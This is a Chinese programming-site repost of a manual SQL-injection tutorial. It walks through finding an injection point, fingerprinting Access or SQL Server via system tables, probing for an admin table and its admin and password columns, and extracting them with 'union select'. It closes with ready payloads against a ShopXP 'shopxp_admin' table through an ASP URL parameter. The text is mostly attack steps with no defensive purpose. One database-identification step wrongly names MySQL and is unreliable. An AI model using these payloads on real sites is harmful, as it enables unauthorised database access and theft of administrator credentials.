文章專題學習下載問答程式設計字典遊戲最近更新

简体中文(ZH-CN) English(EN) 繁体中文(ZH-TW) 日本語(JA) 한국어(KO) Melayu(MS) Français(FR) Deutsch(DE)

首頁 > 資料庫 > mysql教程 > 主體

检测有没有注入点：

WBOY

發布： 2016-06-07 15:10:52

原創

1319 人瀏覽過

检测有没有注入点：直接加一个'号，返回错误页初步断定有漏洞！然后 and 1=1 返回正常 and 1=2 返回错误调用查询时候有漏洞！然后查什么数据库！代码： and (select count (*) from sysobjects)=0 返回错误说明是Access数据库因为Access没有sysobject

检测有没有注入点：
直接加一个'号，返回错误页初步断定有漏洞！
然后 and 1=1 返回正常 and 1=2 返回错误调用查询时候有漏洞！然后查什么数据库！
代码： and (select count (*) from sysobjects)>=0 返回错误说明是Access数据库因为Access没有sysobjects系统表！

如果返回正常那就打下面的代码：
and (select count (*) from msysobjects)>=0 如果返回错误说明是 mysql数据库因为 sql server没有msysobjects系统表！

之后查询没有没有admin表，代码：
and exists(select * from admin) 返回正常说明有admin表返回错误说明没有！

然后查询admin表有没有admin，password两个字段！代码：
and exists(select admin from admin) 返回正常说明有！错误则没有！
and exists(select password from admin) 返回正常说明有！错误则没有！
最后联合查询
order by 查该页面共有多少字段
union select 1,2,3,4,5,6,........n from admin 查账户名和密码的字段位置

TEXTBOX2.ASP?action=modify&newsi%64=

shopxp_admin
and exists(select * from shopxp_admin)
and exists(select admin from shopxp_admin)

union select 1,2,admin,4,5,6,7 from shopxp_admin

union select 1,2,password,4,5,6,7 from shopxp_admin

and exists(select admin from shopxp_admin)

相關標籤：

偵測注入返回

來源：php.cn

上一篇：为什么要关闭数据库连接，可以不关闭吗？下一篇：汉字拼音数据库

本網站聲明

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

作者最新文章

貝萊德將比特幣標記為獨特的多元化工具

2024-09-20 15:51:33
Internet Computer (ICP) Price Prediction: Will ICP Price Hit $24?

2024-09-20 15:47:32
世界幣 (WLD) 價格預測 2022-23

2024-09-20 15:45:32
Top Meme Coins to Invest In Today

2024-09-20 15:39:32
Floki (FLOKI) Price Prediction: Will the Revamped Marketing Help Floki Catch Up on October Gains?

2024-09-20 15:38:32
Next Cryptocurrency to Explode: 5 Coins to Add to Your Watchlist

2024-09-20 15:27:32
Dogecoin: From an Internet Meme to a Digital Currency with a Billion-Dollar Market Capitalization

2024-09-20 15:26:32
ZChains 推出一系列令人興奮的更新和發布，以增強其生態系統

2024-09-20 15:12:32
如何下载小狐狸支付平台的Apple版本

2024-09-20 14:53:01
新手如何在MetaMask进行交易及优缺点

2024-09-20 14:51:01

最新問題

我應該在 apache 中哪裡放置 CustomLog 指令我正在使用php:7.2-apachedocker。我需要禁用運行狀況檢查url登入訪問日誌。基於此鏈接，他們提到了有關修改Customlog指令的資訊。我不是關於需要更改Cust...

來自於 2024-04-06 22:03:59

0

1

990

查詢和公式形成整個表，帶有新列，其中新列是涉及其他條件列值的公式編輯：公式應該是“值”列-根據類別具有最低user_id的“值”列。因此第2行將為0.04，因為類別「A」的最低「user_id」的「value」欄位是0.01。抱歉。我想從表中檢...

來自於 2024-04-06 21:23:40

0

2

530

數獨檢查器無法運作？誰能幫我辨識錯誤？我嘗試了在線編輯器上的所有方法，但仍然收到錯誤。但當我在我的機器上的VSCode上執行此操作時，它工作正常。我很困惑，在沒有發現錯誤的情況下無法提交程式碼。我不知道該去哪裡找了。我...

來自於 2024-04-06 21:21:07

0

1

474

使用具有 3 級層次結構的自訂分類法選擇 woocommerce 相關產品我有一家woocommerce商店，其自訂分類為「運動」。此分類有三個等級-父級、子級、子級-例如：室內運動>競技場運動>籃球。如果使用者查看籃球項目，那麼我希望相關產...

來自於 2024-04-06 20:05:30

0

1

544

部分值條件下的記錄查詢 - SQL技巧分享我有一個名為zipcode的表，其中有一個名為code的欄位。 Code列包含郵遞區號的前綴，例如395453302120312我想寫一個SQL查詢，檢查提供的zipcode是否與...

來自於 2024-04-06 16:01:26

0

1

395

相關專題

更多>

熱門推薦

熱門教學

更多>

相關教學

熱門推薦

最新課程

最新ThinkPHP 5.1全球首發影片教學(60天成就PHP大牛線上訓練課程)

1404323
php入門教程之一週學會PHP

4233434
JAVA 初級入門影片教學

2425806
小甲魚零基礎入門學習Python影片教學

498973
PHP 零基礎入門教學

835969

最新下載

更多>

網站特效

網站源碼

網站素材

前端模板

關於我們免責聲明 Sitemap: PHP中文網：公益線上PHP培訓，幫助PHP學習者快速成長！